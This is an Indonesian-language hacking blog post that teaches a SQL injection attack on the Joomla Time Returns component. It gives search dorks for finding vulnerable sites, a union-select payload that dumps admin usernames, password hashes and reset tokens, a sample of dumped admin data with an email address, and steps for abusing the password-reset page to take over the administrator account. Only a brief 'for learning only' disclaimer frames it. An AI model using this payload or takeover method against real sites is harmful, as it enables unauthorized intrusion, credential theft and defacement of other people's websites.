Joomla Component Time Returns (com_timereturns) SQL Injection

Written By Unknown on 4 Juni 2012 | 13.10

Selamat siang sobat bloggger .... jumpa lagi sama sinchankeke ganteng rolling on the floor

kali ini kita akan membahas exploit joomla Component Time Returns (com_timereturns) SQL Injection
langsung ajah gan ga pake basa basi lagi batting eyelashes

Doork : index.php?option=com_timereturn

inurl:"index.php?option=com_jobprofile "

inurl:"option=com_alameda&controller"

atau agan bisa explorasi sendiri dork nya biar cepet ketemu target yg jooss thumbs up

Exploit atau SQLi : +union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users–

demo : http://site-target.com/index.php?option=com_timereturns&view=timereturns&id=7

hingga jadinya begini jika kita masukan exploit di atas tadi http://site-target.com/index.php?option=com_timereturns&view=timereturns&id=-7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users–

jika web itu belum di patch akan kluar data login admin beserta tokennya kira kira seperti ini data yang keluar 62:ADMINISTRATOR:ADMIN:BUZZINENT@GMAIL.COM:B44062D966F567DEE57B50D463B912B6:QDVLLID6GUNMVNLXNPPTQYGD4QIWZ3HU:SUPER ADMINISTRATOR:0:1:25:2010-07-05 12:16:15:2012-01-25 01:53:41:EE93DCD9644C2C88869A6E374C07529E:$1$D997E088$:ADMIN_LANGUAGE=

LANGUAGE=
EDITOR=
HELPSITE=

TIMEZONE=0 kiss

data di atas yang saya tandain merah itu data yang penting buat reset password dan buat login nanti

agan copy data nya di notepad agan lalu kita akan mencoba reset password nya drooling

masukan kode reset password joomla /index.php?option=com_user&view=reset kira kira seperti ini jadinya www.site-target.com/index.php?option=com_user&view=reset

sesudah itu agan masukin data admin yg agan simpen di notepad tadi jika di situ minta d masukan email admin...agan masukin email admin yg di dapat tadi lalu klik submit setelah itu masukan token yang agan dapat tadi di kolom itu lalu klik submit kembali,,taraaaa keluar lah update new password joomla ,,,tinggal agan ubah sesuai selera passwordnya lalu agan masuk sebagai admin dan silahkan agan lakukan sesuka hati website yang agan crack tadi laughing

NB : jika token yang agan dapat ada symbol $$$ (salt) lebih baik agan mencari target lain karena token salt susah d crack tongue

tutorial ini saya buat hanya untuk pembelajaran saja bukan di gunakan untuk kejahatan ,,,saya tidak bertanggung jawab bila agan menggunakan tutor ini untuk kejahatan dunia maya phbbbbt

sekian dulu tutorial dari sinchankeke ganteng bila ada kata kata yg kurang berkenan atau tutornya berantakan mohon di maklumi saja ....jika agan bingung silahkan tinggalkan komentar agan insya allah nanti akan saya jawab,,,wassalam cool

Description: Joomla Component Time Returns (com_timereturns) SQL Injection Rating: 5 Reviewer: Unknown - ItemReviewed: Joomla Component Time Returns (com_timereturns) SQL Injection

Share this article :